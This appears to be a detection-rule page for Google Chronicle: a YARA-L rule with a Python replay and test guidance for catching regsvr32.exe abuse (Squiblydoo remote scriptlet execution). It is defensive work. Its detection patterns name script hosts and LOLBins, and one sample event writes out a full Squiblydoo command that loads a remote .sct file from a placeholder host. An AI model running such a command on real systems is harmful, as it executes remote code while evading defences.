T1218.010 Google Chronicle · YARA-L

Detect Regsvr32 in Google Chronicle

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister Object Linking and Embedding (OLE) controls, including DLLs, on Windows systems. The 'Squiblydoo' variation passes a URL to a remote COM scriptlet file (SCT) that executes without registry changes, leaving no persistent artifacts. This technique is widely used by QakBot, Emotet, Dridex, Valak, Astaroth, TA551, and many APTs including APT32, APT29, Kimsuky, Cobalt Group, Leviathan, and Storm-0501. It is one of the most abused LOLBins in the threat landscape.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1218 System Binary Proxy Execution
Sub-technique
T1218.010 Regsvr32
Canonical reference
https://attack.mitre.org/techniques/T1218/010/

YARA-L Detection Query

Google Chronicle (YARA-L)
rule T1218_010_Regsvr32_Abuse {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects regsvr32.exe abuse including Squiblydoo remote SCT execution, scrobj.dll inline script loading, suspicious Office and script-host parent processes, and dangerous child processes spawned by regsvr32.exe. Covers T1218.010 abuse by QakBot, Emotet, Dridex, Valak, APT32, APT29, Kimsuky, and Cobalt Group."
    mitre_attack_tactic = "Defense Evasion"
    mitre_attack_technique = "T1218.010"
    severity = "HIGH"
    confidence = "HIGH"
    reference = "https://attack.mitre.org/techniques/T1218/010/"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH" and
    (
      (
        re.regex($e.target.process.file.full_path, `(?i)\\regsvr32\.exe$`) and
        (
          re.regex($e.target.process.command_line, `(?i)https?://`) or
          re.regex($e.target.process.command_line, `(?i)scrobj`) or
          re.regex($e.target.process.command_line, `(?i)\/i:`) or
          re.regex($e.principal.process.file.full_path, `(?i)(winword|excel|outlook|powerpnt|cmd|powershell|wscript|cscript|mshta)\.exe$`)
        )
      ) or
      (
        re.regex($e.principal.process.file.full_path, `(?i)\\regsvr32\.exe$`) and
        re.regex($e.target.process.file.full_path, `(?i)(cmd|powershell|wscript|cscript|rundll32|certutil)\.exe$`)
      )
    )

  condition:
    $e
}

Google Chronicle YARA-L 2.0 rule detecting regsvr32.exe abuse via UDM PROCESS_LAUNCH events. It matches Squiblydoo remote SCT execution (HTTP/S in the command line), scrobj.dll COM scriptlet loading, inline /i: script execution, invocation from Office applications and script interpreters as parent processes, and dangerous binaries (cmd, powershell, wscript, cscript, rundll32, certutil) spawned as children of regsvr32.exe. Note that the parent-process clause fires on any regsvr32.exe launch from cmd.exe or powershell.exe regardless of arguments, which is the main source of the false positives listed below. Compatible with Chronicle Forwarder ingesting Sysmon or Defender ATP process telemetry.

Data Sources

  • Google Chronicle SIEM
  • Chronicle Forwarder (Sysmon)
  • Microsoft Defender for Endpoint via Chronicle

Required Tables

UDM events (metadata.event_type = PROCESS_LAUNCH)

False Positives & Tuning

  • IT operations runbooks invoking regsvr32.exe from cmd.exe or powershell.exe to register or unregister ActiveX controls and COM automation servers during legitimate configuration management
  • Office add-in and plugin installers that legitimately spawn regsvr32.exe from an Office parent (winword.exe, outlook.exe) to register COM shim DLLs during first-run initialisation
  • Authorised red team or penetration testing engagements using Squiblydoo payloads — correlate alert timestamps against approved change management records before escalating
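To see which branch of the rule each kind of process launch trips, and why the runbook case above alerts, here is the rule's logic replayed in Python over constructed UDM-style events. This is an added example, not the page's rule or Chronicle code; the file paths and command lines are invented samples, and the argument names map to the UDM fields the rule references.

```python
import re

# Patterns mirror the rule's re.regex() calls; YARA-L's (?i) becomes re.I here.
REGSVR32 = re.compile(r"\\regsvr32\.exe$", re.I)
CMDLINE_INDICATORS = [
    re.compile(r"https?://", re.I),  # Squiblydoo: remote SCT fetched over HTTP(S)
    re.compile(r"scrobj", re.I),     # scrobj.dll COM scriptlet host
    re.compile(r"/i:", re.I),        # /i: install argument carrying the script reference
]
SUSPICIOUS_PARENT = re.compile(
    r"(winword|excel|outlook|powerpnt|cmd|powershell|wscript|cscript|mshta)\.exe$", re.I)
DANGEROUS_CHILD = re.compile(r"(cmd|powershell|wscript|cscript|rundll32|certutil)\.exe$", re.I)


def evaluate(parent, target, cmdline="", event_type="PROCESS_LAUNCH"):
    """Return the rule branch that fires for one event, or None.

    parent  = principal.process.file.full_path
    target  = target.process.file.full_path
    cmdline = target.process.command_line
    """
    if event_type != "PROCESS_LAUNCH":
        return None
    # Branch 1: regsvr32.exe is the launched process with a suspicious command line or parent.
    if REGSVR32.search(target) and (
        any(p.search(cmdline) for p in CMDLINE_INDICATORS) or SUSPICIOUS_PARENT.search(parent)
    ):
        return "regsvr32_target"
    # Branch 2: regsvr32.exe is the parent of a shell, script host or other LOLBin.
    if REGSVR32.search(parent) and DANGEROUS_CHILD.search(target):
        return "regsvr32_parent"
    return None


# Constructed sample events (not real telemetry): three abuse patterns, one benign
# vendor install, and the IT-runbook case listed under False Positives & Tuning.
SYS32 = r"C:\Windows\System32"
SAMPLES = {
    "squiblydoo": (r"C:\Windows\explorer.exe", SYS32 + r"\regsvr32.exe",
                   r"regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"),
    "office_parent": (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                      SYS32 + r"\regsvr32.exe", r"regsvr32.exe /s C:\Users\u\AppData\Local\Temp\x.dll"),
    "child_shell": (SYS32 + r"\regsvr32.exe", SYS32 + r"\cmd.exe", "cmd.exe /c whoami"),
    "benign_install": (SYS32 + r"\msiexec.exe", SYS32 + r"\regsvr32.exe",
                       r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"'),
    "runbook": (SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", SYS32 + r"\regsvr32.exe",
                r'regsvr32.exe /s "C:\Program Files\Vendor\automation.dll"'),
}


def run_samples():
    """Map each sample name to the branch that fired (None means no alert)."""
    return {name: evaluate(*fields) for name, fields in SAMPLES.items()}
```

The "runbook" sample alerts purely on its powershell.exe parent, so a tuning exclusion for that case should key on the parent plus a known-good DLL path rather than on the parent alone.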

Testing Methodology

Validate this detection against three Atomic Red Team tests for this sub-technique. Each test below lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Squiblydoo - Regsvr32 Remote SCT Execution

    Expected signal: Sysmon Event ID 1: regsvr32.exe with /s /n /u /i: URL and scrobj.dll in command line. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. Security Event ID 4688. Sysmon Event ID 7: scrobj.dll loaded by regsvr32.exe.

  2. Test 2: Regsvr32 DLL Execution from Temp Directory

    Expected signal: Sysmon Event ID 11: DLL written to Temp. Sysmon Event ID 1: regsvr32.exe with /s and Temp path. Sysmon Event ID 7: DLL loaded by regsvr32.exe. Security Event ID 4688.

  3. Test 3: Regsvr32 Launched from PowerShell Parent

    Expected signal: Sysmon Event ID 1: powershell.exe then regsvr32.exe with ParentImage=powershell.exe. The suspicious-parent clause of the rule fires. Security Event ID 4688 for both. Regsvr32 will fail (no valid DLL) but the process creation event fires.
